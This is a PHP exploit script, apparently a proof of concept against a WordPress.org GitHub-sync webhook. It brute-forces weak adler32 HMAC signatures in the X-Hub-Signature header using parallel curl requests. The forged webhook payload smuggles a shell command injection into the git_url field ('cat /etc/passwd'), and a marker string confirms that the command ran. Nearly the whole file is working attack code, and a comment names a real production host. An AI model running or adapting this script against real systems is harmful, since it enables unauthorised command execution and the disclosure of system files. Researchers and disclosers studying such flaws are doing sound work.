<?php

$payload = json_encode(array(
	'repository' => array(
		'full_name' => 'pento/react',
		'git_url'   => ';echo hotsauce;cat /etc/passwd;#',
	),
));

echo "Building groups of most common 1st bytes in adler32's 2 16bit hashing functions.\n";
$max = 0xfffff;
$common16bitPrefixes = array();
for ($i = 0; $i < $max; $i++) {
	$hash = hash_hmac('adler32', $payload, sha1(uniqid(true)));
	$hmac = substr($hash, 0, 2) . "%02x" . substr($hash, 4, 2) . "%02x";
	if (!array_key_exists($hmac, $common16bitPrefixes)) {
		$common16bitPrefixes[$hmac] = 0;
	}
	$common16bitPrefixes[$hmac]++;
}

arsort($common16bitPrefixes, SORT_NUMERIC);
echo "Built profile over $max iterations. " . count($common16bitPrefixes) . " common 1st bytes found.\n";
$runningTotal = 0;
$counter = 0;
foreach ($common16bitPrefixes as $hash => $hashCount) {
	$runningTotal += ($hashCount / $max) * 100;
	printf("%s : %d/%d (%f%% of the profiled adler32 hashes fall into this range, %f%% total hashes to this point) = %d requests to api.wordpress.org. %f%% of 32bit address space.\n",
		str_replace("%02x", "**", $hash), $hashCount, $max, ($hashCount / $max) * 100, $runningTotal, ++$counter * 0xffff,
		(($counter * 0xffff) / 0xffffffff) * 100);
}

$multiCurl = new MultiCurl(50);

$requestCount = 0;
foreach ($common16bitPrefixes as $key => $value) {
	$currentHashGroup = str_replace("%02x", "**", $key);
	echo "Testing hash group $currentHashGroup\n";
	for ($i = 0; $i <= 0xff; $i++) {
		for ($j = 0; $j <= 0xff; $j++) {
			$hash = sprintf($key, $i, $j);

			// Add to async request handler here.
			// $url = 'http://api.wordpress.org/dotorg/github-sync/feature-plugins.php';
			$url = 'http://hostname/dotorg/github-sync/feature-plugins.php';
			$ch = curl_init($url);
			curl_setopt($ch, CURLOPT_POST, 1);
			curl_setopt($ch, CURLOPT_POSTFIELDS, array(
				'payload' => $payload,
			));
			curl_setopt($ch, CURLOPT_HTTPHEADER, array(
				'X-Hub-Signature: adler32=' . $hash,
			));

			$multiCurl->addUrl($url, new VerifyAttackSuccess($hash, ++$requestCount), $ch);
//			echo "Queuing request for hash $hash.\n";
			if ($multiCurl->reachedLimit()) {
//				echo "Executing requests.\n";
				$multiCurl->ping();
				echo "Current hash group: $currentHashGroup. $requestCount total requests executed.\n";
			}
		}
	}
}
$multiCurl->ping();

class VerifyAttackSuccess {

	private $hash;
	private $requestCount;

	public function __construct($hash, $requestCount) {
		$this->hash = $hash;
		$this->requestCount = $requestCount;
	}

	public function __invoke($ch, $url, $content) {
		if (strpos($content, 'hotsauce') !== false) {
			echo 'Success with ' . $this->hash . ". " . $this->requestCount . " total requests.\n";
			echo "Dumping request content:\n\n$content";
			exit;
		}
	}
}


class MultiCurl {
	protected $limit;
	protected $queuedCount;
	protected $handlers = array();
	protected $ch;

	public function __construct($limit = 10) {
		$this->limit = $limit;
		$this->ch = curl_multi_init();
	}

	public function addUrl($url, Callable $callback, $ch = null) {
		if (!is_resource($ch)) {
			$ch = curl_init($url);
		}
		curl_setopt_array($ch, array(
			CURLOPT_RETURNTRANSFER => 1
		));
		curl_multi_add_handle($this->ch, $ch);
		$this->handlers[] = array($ch, $url, $callback);
		$this->queuedCount++;
	}

	public function reachedLimit() {
		return $this->queuedCount >= $this->limit;
	}

	public function ping() {
		$active = null;
		do {
			$mrc = curl_multi_exec($this->ch, $active);
		} while ($mrc == CURLM_CALL_MULTI_PERFORM);

		while ($active && $mrc == CURLM_OK) {
			if (curl_multi_select($this->ch) != -1) {
				do {
					$mrc = curl_multi_exec($this->ch, $active);
				} while ($mrc == CURLM_CALL_MULTI_PERFORM);
			}
		}

		foreach ($this->handlers as $id => $handle) {
			$handle[2]($handle[0], $handle[1], curl_multi_getcontent($handle[0]));
			//close the handles
			curl_multi_remove_handle($this->ch, $handle[0]);
			curl_close($handle[0]);
			unset($this->handlers[$id]);
			$this->queuedCount--;
		}
	}
}
